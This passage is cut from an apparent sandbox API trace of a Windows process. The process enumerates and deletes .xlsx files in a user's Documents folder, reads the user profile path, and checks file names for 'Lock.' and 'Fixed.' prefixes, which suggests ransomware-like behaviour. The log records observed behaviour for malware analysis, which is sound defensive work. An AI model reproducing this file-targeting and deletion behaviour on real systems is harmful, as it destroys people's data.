ftLastAccessTime.dwLowDateTime=0x93517fe0, ftLastAccessTime.dwHighDateTime=0x1d4d050, ftLastWriteTime.dwLowDateTime=0x93517fe0, ftLastWriteTime.dwHighDateTime=0x1d4d050, nFileSizeHigh=0x0, nFileSizeLow=0x67e9, dwReserved0=0x1be5, dwReserved1=0x4, cFileName="icIcTV1 eT9I1Qro.xlsx", cAlternateFileName="ICICTV~1.XLS")) returned 0xaa5920 [0262.825] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\icictv1 et9i1qro.xlsx")) returned 1 [0262.837] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74dee10, ftCreationTime.dwHighDateTime=0x1d4e7bf, ftLastAccessTime.dwLowDateTime=0x93517fe0, ftLastAccessTime.dwHighDateTime=0x1d4d050, ftLastWriteTime.dwLowDateTime=0x93517fe0, ftLastWriteTime.dwHighDateTime=0x1d4d050, nFileSizeHigh=0x0, nFileSizeLow=0x67e9, dwReserved0=0x1be5, dwReserved1=0x4, cFileName="icIcTV1 eT9I1Qro.xlsx", cAlternateFileName="ICICTV~1.XLS")) returned 0 [0262.837] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0262.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.838] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0262.838] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0262.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.839] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0262.842] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/icIcTV1 eT9I1Qro.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx", lpFilePart=0x8bf658*="icIcTV1 eT9I1Qro.xlsx") returned 0x3d [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.842] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\icictv1 et9i1qro.xlsx")) returned 0xffffffff [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0262.843] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.843] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IqPW.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qPW.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PW.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.844] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IqPW.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qPW.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PW.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.845] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0262.845] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0262.845] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.845] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.846] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0262.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/IqPW.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60886d20, ftCreationTime.dwHighDateTime=0x1d4e258, ftLastAccessTime.dwLowDateTime=0x9b4fc9f0, ftLastAccessTime.dwHighDateTime=0x1d4dc57, ftLastWriteTime.dwLowDateTime=0x9b4fc9f0, ftLastWriteTime.dwHighDateTime=0x1d4dc57, nFileSizeHigh=0x0, nFileSizeLow=0x182e1, dwReserved0=0x9fe0047, dwReserved1=0x24edc, cFileName="IqPW.xlsx", cAlternateFileName="IQPW~1.XLS")) returned 0xaa5920 [0262.847] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.848] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0262.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.850] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.850] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.850] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 